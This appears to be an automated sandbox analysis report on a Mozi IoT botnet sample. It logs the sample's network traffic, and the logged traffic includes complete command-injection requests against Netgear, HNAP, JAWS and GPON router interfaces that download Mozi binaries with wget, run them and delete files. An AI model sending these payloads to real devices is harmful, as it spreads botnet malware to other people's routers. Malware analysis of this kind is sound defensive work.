xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.243.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 18.228.54.139:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.40.37.31:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.137.248.191:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Sample listens on a socket

Source: /tmp/MGuvcs6Ocz (PID: 4622)

Socket: 0.0.0.0::44343

Jump to behavior

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 121.130.248.221
Source: unknown	TCP traffic detected without corresponding DNS query: 71.181.75.105
Source: unknown	TCP traffic detected without corresponding DNS query: 168.27.245.114
Source: unknown	TCP traffic detected without corresponding DNS query: 87.83.202.29
Source: unknown	TCP traffic detected without corresponding DNS query: 137.88.31.213
Source: unknown	TCP traffic detected without corresponding DNS query: 48.145.90.179
Source: unknown	TCP traffic detected without corresponding DNS query: 157.46.152.22
Source: unknown	TCP traffic detected without corresponding DNS query: 219.143.155.172
Source: unknown	TCP traffic detected without corresponding DNS query: 24.81.183.180
Source: unknown	TCP traffic detected without corresponding DNS query: 11.140.34.223
Source: unknown	TCP traffic detected without corresponding DNS query: 71.11.190.90
Source: unknown	TCP traffic detected without corresponding DNS query: 191.250.144.46
Source: unknown	TCP traffic detected without corresponding DNS query: 37.215.228.246
Source: unknown	TCP traffic detected without corresponding DNS query: 205.51.33.91
Source: unknown	TCP traffic detected without corresponding DNS query: 103.102.254.14
Source: unknown	TCP traffic detected without corresponding DNS query: 154.136.201.94
Source: unknown	TCP traffic detected without corresponding DNS query: 204.189.67.153
Source: unknown	TCP traffic detected without corresponding DNS query: 164.142.55.184
Source: unknown	TCP traffic detected without corresponding DNS query: 15.51.212.241
Source: unknown	TCP traffic detected without corresponding DNS query: 7.224.163.250
Source: unknown	TCP traffic detected without corresponding DNS query: 118.114.67.42
Source: unknown	TCP traffic detected without corresponding DNS query: 57.163.20.143
Source: unknown	TCP traffic detected without corresponding DNS query: 193.22.15.210
Source: unknown	TCP traffic detected without corresponding DNS query: 94.185.176.145
Source: unknown	TCP traffic detected without corresponding DNS query: 78.27.98.91
Source: unknown	TCP traffic detected without corresponding DNS query: 36.54.249.217
Source: unknown	TCP traffic detected without corresponding DNS query: 160.226.225.149
Source: unknown	TCP traffic detected without corresponding DNS query: 184.235.140.0
Source: unknown	TCP traffic detected without corresponding DNS query: 130.140.7.168
Source: unknown	TCP traffic detected without corresponding DNS query: 131.112.27.0
Source: unknown	TCP traffic detected without corresponding DNS query: 184.49.220.2
Source: unknown	TCP traffic detected without corresponding DNS query: 166.216.172.210
Source: unknown	TCP traffic detected without corresponding DNS query: 98.135.167.186
Source: unknown	TCP traffic detected without corresponding DNS query: 2.99.233.91
Source: unknown	TCP traffic detected without corresponding DNS query: 211.105.77.124
Source: unknown	TCP traffic detected without corresponding DNS query: 103.186.65.125
Source: unknown	TCP traffic detected without corresponding DNS query: 1.172.219.187
Source: unknown	TCP traffic detected without corresponding DNS query: 50.192.24.84
Source: unknown	TCP traffic detected without corresponding DNS query: 58.244.219.70
Source: unknown	TCP traffic detected without corresponding DNS query: 7.177.190.112
Source: unknown	TCP traffic detected without corresponding DNS query: 88.91.75.33
Source: unknown	TCP traffic detected without corresponding DNS query: 163.206.226.193
Source: unknown	TCP traffic detected without corresponding DNS query: 134.67.11.73
Source: unknown	TCP traffic detected without corresponding DNS query: 30.115.123.158
Source: unknown	TCP traffic detected without corresponding DNS query: 12.220.127.50
Source: unknown	TCP traffic detected without corresponding DNS query: 51.78.124.189
Source: unknown	TCP traffic detected without corresponding DNS query: 212.212.35.40
Source: unknown	TCP traffic detected without corresponding DNS query: 32.39.252.126
Source: unknown	TCP traffic detected without corresponding DNS query: 15.178.136.128
Source: unknown	TCP traffic detected without corresponding DNS query: 92.69.32.77

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.226.101.83:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 99.192.234.217:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 185.29.123.11:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.207.67.88:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.217.112.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.76.236.93:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 79.171.18.106:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.90.79.101:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Apr 2021 18:59:02 GMTServer: Apache/2.4.41 ()Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

URLs found in memory or binary data

